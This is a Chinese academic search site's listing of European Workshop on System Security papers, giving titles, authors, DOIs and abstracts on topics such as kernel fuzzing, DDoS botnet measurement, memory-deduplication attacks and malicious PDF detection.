发布求助
文献互助 智能选刊 最新文献

European Workshop on System Security最新文献

筛选
英文 中文
A connection pattern-based approach to detect network traffic anomalies in critical infrastructures 一种基于连接模式的方法,用于检测关键基础设施中的网络流量异常
European Workshop on System Security Pub Date : 2014-04-13 DOI: 10.1145/2592791.2592792
B. Genge, Dorin Adrian Rusu, P. Haller
{"title":"A connection pattern-based approach to detect network traffic anomalies in critical infrastructures","authors":"B. Genge, Dorin Adrian Rusu, P. Haller","doi":"10.1145/2592791.2592792","DOIUrl":"https://doi.org/10.1145/2592791.2592792","url":null,"abstract":"Recent trends in Critical Infrastructures (CIs), e.g., power plants and energy smart grids, showed an increased use of commodity, off-the-shelf Information and Communication Technologies (ICT) hardware and software. Although this enabled the implementation of a broad palette of new features, the pervasive use of ICT, especially within the core of CIs, i.e., in Industrial Control Systems (ICSs), attracted a new class of attacks in which cyber disturbances propagate to the physical dimension of CIs. To ensure a more effective detection of cyber attacks against the ICS of CIs, we have developed SPEAR, a systematic approach that automatically configures anomaly detection engines to detect attacks that violate connection patterns specific to ICSs. The approach is validated by experimental scenarios including traffic traces from real industrial equipment and real malware (Stuxnet).","PeriodicalId":302603,"journal":{"name":"European Workshop on System Security","volume":"2 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2014-04-13","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"117186683","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 32
Improving Mac OS X security through gray box fuzzing technique 通过灰盒模糊技术提高Mac OS X的安全性
European Workshop on System Security Pub Date : 2014-04-13 DOI: 10.1145/2592791.2592793
S. Mazzone, M. Pagnozzi, Aristide Fattori, Alessandro Reina, A. Lanzi, D. Bruschi
{"title":"Improving Mac OS X security through gray box fuzzing technique","authors":"S. Mazzone, M. Pagnozzi, Aristide Fattori, Alessandro Reina, A. Lanzi, D. Bruschi","doi":"10.1145/2592791.2592793","DOIUrl":"https://doi.org/10.1145/2592791.2592793","url":null,"abstract":"The kernel is the core of any operating system, and its security is of vital importance. A vulnerability, in any of its parts, compromises the whole system security model. Unprivileged users that find such vulnerabilities can easily crash the attacked system, or obtain administration privileges. In this paper we propose LynxFuzzer, a framework to test kernel extensions, i.e., the dynamically loadable components of Mac OS X kernel. To overcome the challenges posed by interacting with kernel-level software, LynxFuzzer includes a bare-metal hardware-assisted hypervisor, that allows to seamlessly inspect the state of a running kernel and its components. We implemented and evaluated LynxFuzzer on Mac OS X Mountain Lion and we obtained unexpected results: we indivuated 6 bugs in 17 kernel extensions we tested, thus proving the usefulness and effectiveness of our framework.","PeriodicalId":302603,"journal":{"name":"European Workshop on System Security","volume":"28 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2014-04-13","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"124879782","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 5
On measuring the impact of DDoS botnets 关于测量DDoS僵尸网络的影响
European Workshop on System Security Pub Date : 2014-04-13 DOI: 10.1145/2592791.2592794
Arne Welzel, C. Rossow, H. Bos
{"title":"On measuring the impact of DDoS botnets","authors":"Arne Welzel, C. Rossow, H. Bos","doi":"10.1145/2592791.2592794","DOIUrl":"https://doi.org/10.1145/2592791.2592794","url":null,"abstract":"Miscreants use DDoS botnets to attack a victim via a large number of malware-infected hosts, combining the bandwidth of the individual PCs. Such botnets have thus a high potential to render targeted services unavailable. However, the actual impact of attacks by DDoS botnets has never been evaluated. In this paper, we monitor C&C servers of 14 DirtJumper and Yoddos botnets and record the DDoS targets of these networks. We then aim to evaluate the availability of the DDoS victims, using a variety of measurements such as TCP response times and analyzing the HTTP content. We show that more than 65% of the victims are severely affected by the DDoS attacks, while also a few DDoS attacks likely failed.","PeriodicalId":302603,"journal":{"name":"European Workshop on System Security","volume":"43 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2014-04-13","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"123762855","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 37
Memory deduplication as a threat to the guest OS 内存重复数据删除对客户操作系统构成威胁
European Workshop on System Security Pub Date : 2011-04-10 DOI: 10.1145/1972551.1972552
K. Suzaki, K. Iijima, T. Yagi, Cyrille Artho
{"title":"Memory deduplication as a threat to the guest OS","authors":"K. Suzaki, K. Iijima, T. Yagi, Cyrille Artho","doi":"10.1145/1972551.1972552","DOIUrl":"https://doi.org/10.1145/1972551.1972552","url":null,"abstract":"Memory deduplication shares same-content memory pages and reduces the consumption of physical memory. It is effective on environments that run many virtual machines with the same operating system. Memory deduplication, however, is vulnerable to memory disclosure attacks, which reveal the existence of an application or file on another virtual machine. Such an attack takes advantage of a difference in write access times on deduplicated memory pages that are re-created by Copy-On-Write. In our experience on KSM (kernel samepage merging) with the KVM virtual machine, the attack could detect the existence of sshd and apache2 on Linux, and IE6 and Firefox on WindowsXP. It also could detect a downloaded file on the Firefox browser. We describe the attack mechanism in this paper, and also mention countermeasures against this attack.","PeriodicalId":302603,"journal":{"name":"European Workshop on System Security","volume":"10 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2011-04-10","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"123671948","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 130
An empirical study on the security of cross-domain policies in rich internet applications 富互联网应用中跨域策略安全性的实证研究
European Workshop on System Security Pub Date : 2011-04-10 DOI: 10.1145/1972551.1972558
Georgios Kontaxis, Demetres Antoniades, Iasonas Polakis, E. Markatos
{"title":"An empirical study on the security of cross-domain policies in rich internet applications","authors":"Georgios Kontaxis, Demetres Antoniades, Iasonas Polakis, E. Markatos","doi":"10.1145/1972551.1972558","DOIUrl":"https://doi.org/10.1145/1972551.1972558","url":null,"abstract":"Adobe Flash and Microsoft Silverlight are two widely adopted platforms for providing Rich Internet Applications (RIA) over the World Wide Web. The need for RIAs to retrieve content hosted on different domains, in order to enrich user experience, led to the use of cross-domain policies by content providers. Cross-domain policies define the list of RIA hosting domains that are allowed to retrieve content from the content provider's domain. Misinterpretation or misconfigurations of the policies may give the opportunity to malicious RIAs to access and handle users' private data.\u0000 In this paper we present an extensive study on the deployment and security issues of cross-domain policies in the web. Through the examination of a large set of popular and diverse (both geographically and content-wise) websites, we reveal that about 50% (more than 6.500 websites) of the websites that have adopted such policies are vulnerable to attacks. Furthermore, we find such policies in more than 50% of the top 500 websites, examined both globally and per-country. Additionally, we examine local sets of e-shopping websites and find that up to 83% implement weak policies. Interestingly, we observe that the less popular a website is, the higher the probability that it will have a weak policy. Compared to previous studies there is an obvious increasing trend in the adoption of RIA but, at the same time, a decreasing trend regarding secure implementations. Through a proof-of-concept attack implementation and a number of real-world examples, we highlight the security impacts of these policy misconfigurations.","PeriodicalId":302603,"journal":{"name":"European Workshop on System Security","volume":"27 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2011-04-10","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"130542982","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 20
On passive inference attacks against physical-layer key extraction? 针对物理层密钥提取的被动推理攻击?
European Workshop on System Security Pub Date : 2011-04-10 DOI: 10.1145/1972551.1972559
Matthew Edman, A. Kiayias, B. Yener
{"title":"On passive inference attacks against physical-layer key extraction?","authors":"Matthew Edman, A. Kiayias, B. Yener","doi":"10.1145/1972551.1972559","DOIUrl":"https://doi.org/10.1145/1972551.1972559","url":null,"abstract":"Physical-layer key extraction techniques attempt to derive a shared symmetric cryptographic key between two wireless devices based on the principle of channel reciprocity, which states that the signal envelope between two communicating devices is strongly correlated. A key security assumption made in previous literature is that the signal envelope observed by an adversary located greater than a half-wavelength away is uncorrelated with that shared between the two communicating devices; however, this assumption has yet to be rigorously evaluated in previous work on physical-layer key extraction. In this paper, we present an experimental analysis that examines the relationship between the channel measurements used to extract a symmetric key between two devices and those observed by one or more distantly located passive adversaries. We find that, contrary to previous assumptions, there does exist a strong correlation in measurements observed by adversaries located significantly greater than a half-wavelength away from two communicating wireless devices. Further, we provide initial results that show the extent to which the adversary is able to leverage such correlations to infer portions of the key extracted between two devices using previously published physical-layer key extraction techniques.","PeriodicalId":302603,"journal":{"name":"European Workshop on System Security","volume":"125 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2011-04-10","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"115807458","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 67
Combining static and dynamic analysis for the detection of malicious documents 将静态分析与动态分析相结合,实现对恶意文档的检测
European Workshop on System Security Pub Date : 2011-04-10 DOI: 10.1145/1972551.1972555
Zacharias Tzermias, Giorgos Sykiotakis, M. Polychronakis, E. Markatos
{"title":"Combining static and dynamic analysis for the detection of malicious documents","authors":"Zacharias Tzermias, Giorgos Sykiotakis, M. Polychronakis, E. Markatos","doi":"10.1145/1972551.1972555","DOIUrl":"https://doi.org/10.1145/1972551.1972555","url":null,"abstract":"The widespread adoption of the PDF format for document exchange has given rise to the use of PDF files as a prime vector for malware propagation. As vulnerabilities in the major PDF viewers keep surfacing, effective detection of malicious PDF documents remains an important issue. In this paper we present MDScan, a standalone malicious document scanner that combines static document analysis and dynamic code execution to detect previously unknown PDF threats. Our evaluation shows that MDScan can detect a broad range of malicious PDF documents, even when they have been extensively obfuscated.","PeriodicalId":302603,"journal":{"name":"European Workshop on System Security","volume":"4 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2011-04-10","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"130864444","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 131
Abusing locality in shared web hosting 滥用局部性在共享虚拟主机
European Workshop on System Security Pub Date : 2011-04-10 DOI: 10.1145/1972551.1972553
Nick Nikiforakis, W. Joosen, Martin Johns
{"title":"Abusing locality in shared web hosting","authors":"Nick Nikiforakis, W. Joosen, Martin Johns","doi":"10.1145/1972551.1972553","DOIUrl":"https://doi.org/10.1145/1972551.1972553","url":null,"abstract":"The increasing popularity of the World Wide Web has made more and more individuals and companies to identify the need of acquiring a Web presence. The most common way of acquiring such a presence is through Web hosting companies and the most popular hosting solution is shared Web hosting.\u0000 In this paper we investigate the workings of shared Web hosting and we point out the potential lack of session isolation between domains hosted on the same physical server. We present two novel server-side attacks against session storage which target the logic of a Web application instead of specific logged-in users. Due to the lack of isolation, an attacker with a domain under his control can force arbitrary sessions to co-located Web applications as well as inspect and edit the contents of their existing active sessions. Using these techniques, an attacker can circumvent authentication mechanisms, elevate his privileges, steal private information and conduct attacks that would be otherwise impossible. Finally, we test the applicability of our attacks against common open-source software and evaluate their effectiveness in the presence of generic server-side countermeasures.","PeriodicalId":302603,"journal":{"name":"European Workshop on System Security","volume":"84 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2011-04-10","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"131451986","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 16
Attack surface reduction for commodity OS kernels: trimmed garden plants may attract less bugs 减少商品操作系统内核的攻击面:修剪过的花园植物可能会吸引更少的bug
European Workshop on System Security Pub Date : 2011-04-10 DOI: 10.1145/1972551.1972557
Anil Kurmus, A. Sorniotti, R. Kapitza
{"title":"Attack surface reduction for commodity OS kernels: trimmed garden plants may attract less bugs","authors":"Anil Kurmus, A. Sorniotti, R. Kapitza","doi":"10.1145/1972551.1972557","DOIUrl":"https://doi.org/10.1145/1972551.1972557","url":null,"abstract":"Kernel vulnerabilities are a major current practical security problem, as attested by the weaknesses and flaws found in many commodity operating system kernels in recent years. Ever-growing code size in those projects, due to the addition of new features and the reluctance to remove legacy support, indicate that this problem will remain a severe system security threat in the foreseeable future. Reactive measures such as bug fixes via code reviews and testing, while effective, can only alleviate the issue. Furthermore, common practices in system hardening often focus on complex and sometimes hard to achieve goals that require extensive manual intervention such as security policies for sandboxing.\u0000 In this paper, we explore an alternative, automated and effective way of reducing the attack surface in commodity operating system kernels, which we call trimming. Trimming is a two-fold process: an initial analysis of a given system for unused kernel code sections is followed by an enforcement phase, in which the unused sections are removed or prevented from being executed. We discuss the requirements that should be reflected in the design of a trimming infrastructure, and present a lightweight and flexible implementation example for the Linux kernel by using dynamic binary instrumentation as provided by kprobes. Our evaluations show we can, in the case of a web server, reduce the attack surface of the kernel (in terms of the number of kernel functions accessible from unprivileged users) by about 88%.","PeriodicalId":302603,"journal":{"name":"European Workshop on System Security","volume":"65 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2011-04-10","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"121947714","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 41
Thwarting real-time dynamic unpacking 阻碍实时动态拆包
European Workshop on System Security Pub Date : 2011-04-10 DOI: 10.1145/1972551.1972556
Leyla Bilge, A. Lanzi, D. Balzarotti
{"title":"Thwarting real-time dynamic unpacking","authors":"Leyla Bilge, A. Lanzi, D. Balzarotti","doi":"10.1145/1972551.1972556","DOIUrl":"https://doi.org/10.1145/1972551.1972556","url":null,"abstract":"Packing is a very popular technique for obfuscating programs, and malware in particular. In order to successfully detect packed malware, dynamic unpacking techniques have been proposed in literature. Dynamic unpackers execute and monitor a packed program, and try to guess when the original code of the program is available unprotected in memory. The major drawback of dynamic unpackers is the performance overhead they introduce. To reduce the overhead and make it possible to perform dynamic unpacking at end-hosts, researches have proposed real-time unpackers that operate at a coarser granularity, namely OmniUnpack and Justin. In this paper, we present a simple compile-time packing algorithm that maximizes the cost of unpacking and minimizes the amount of program code that can be automatically recovered by real-time coarse grained unpackers. The evaluation shows that the real-time dynamic unpackers are totally ineffective against this algorithm.","PeriodicalId":302603,"journal":{"name":"European Workshop on System Security","volume":"1 1","pages":"0"},"PeriodicalIF":0.0,"publicationDate":"2011-04-10","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"130526603","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":0,"RegionCategory":"","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 10
首页 上一页 下一页 尾页
0
×
引用
GB/T 7714-2015
复制
MLA
复制
APA
复制
导出至
BibTeX EndNote RefMan NoteFirst NoteExpress
×
提示
您的信息不完整,为了账户安全,请先补充。
现在去补充
×
提示
您因"违规操作"
具体请查看互助需知
我知道了
×
提示
现在去查看 取消
×
提示
确定
请完成安全验证×
相关产品
×
本文献相关产品
联系我们:info@booksci.cn Book学术提供免费学术资源搜索服务,方便国内外学者检索中英文文献。致力于提供最便捷和优质的服务体验。 Copyright © 2023 布克学术 All rights reserved.
京ICP备2023020795号-1
ghs 京公网安备 11010802042870号
Book学术文献互助
Book学术文献互助群
群 号:481959085
Book学术官方微信